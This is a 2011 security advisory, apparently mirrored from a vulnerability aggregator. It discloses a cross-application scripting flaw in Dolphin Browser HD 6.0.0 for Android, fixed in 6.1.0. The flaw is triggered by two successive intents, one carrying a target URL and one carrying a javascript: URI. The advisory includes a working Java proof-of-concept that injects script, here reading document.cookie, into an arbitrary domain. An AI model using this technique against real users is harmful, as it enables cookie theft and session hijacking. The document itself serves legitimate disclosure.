Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27060
HistorySep 26, 2011 - 12:00 a.m.

Advisory: Dolphin Browser HD Cross-Application Scripting

2011-09-2600:00:00
vulners.com
18

1 Background

Android applications are executed in a sandbox environment, to ensure that no
application can access sensitive information held by another, without adequate
privileges. For example, the Dolphin browser application holds sensitive
information such as cookies, cache and history, and this cannot be accessed
by third-party apps. An android app may request specific privileges during
its installation; if granted by the user, the app's capabilities are extended.

Intents are used by Android apps for intercommunication. These objects can be
broadcast, passed to the startActivity call (when an application starts another
activity), or passed to the startService call (when an application starts a
service). Normally, when startActivity is called, the target activity's
onCreate method is executed. However, under AndroidManifest.xml it is possible
to define different launch tags, which affect this behavior. One example is the
singleTask launch tag, which makes the activity act as a singleton. This affects
the startActivity call: if the activity has already been started when the call
is made, the activity's onNewIntent member function is called instead of its
onCreate method.

2 Vulnerability

A 3rd party application may exploit Dolphin Browser HD's URL loading process in
order to inject JavaScript code into an arbitrary domain thus break Android's
sandboxing. This can be done by sending two consecutive startActivity calls. The
first call includes the attacked domain, and causes Dolphin Browser HD to load
it, while the second call contains JavaScript code. the JavaScript URI will be
opened under the current tab, i.e. the attacked domain.

3 Impact

By exploiting this vulnerability a malicious, non-privileged application may
inject JavaScript code into the context of any domain; therefore, this
vulnerability has the same implications as global XSS, albeit from an installed
application rather than another website. Additionally, an application may
install itself as a service, in order to inject JavaScript code from time to
time into the currently opened tab, thus completely intercepting the user's
browsing experience.

4 Proof-of-Concept

The following is a PoC for the second technique:

public class CasExploit extends Activity
{
static final String mPackage = "mobi.mgeek.TunnyBrowser";
static final String mClass = "BrowserActivity";
static final String mUrl = "http://target.domain/";
static final String mJavascript = "alert(document.cookie)";
static final int mSleep = 15000;

@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
startBrowserActivity(mUrl);
try {
Thread.sleep(mSleep);
}
catch (InterruptedException e) {}
startBrowserActivity("javascript:" + mJavascript);

}

private void startBrowserActivity(String url) {
Intent res = new Intent("android.intent.action.VIEW");
res.setComponent(new ComponentName(mPackage,mPackage+"."+mClass));
res.setData(Uri.parse(url));
startActivity(res);
}

}

5 Vulnerable versions

Dolphin Browser HD 6.0.0 has been found vulnerable.

6 Vendor Response

Dolphin Browser HD 6.1.0 has been released to Android Market, which incorporates
a fix for this bug.

8 Credit

9 References

10 Acknowledgments

We would like to thank the Dolphin Browser team for the efficient and quick way
in which it handled this security issue.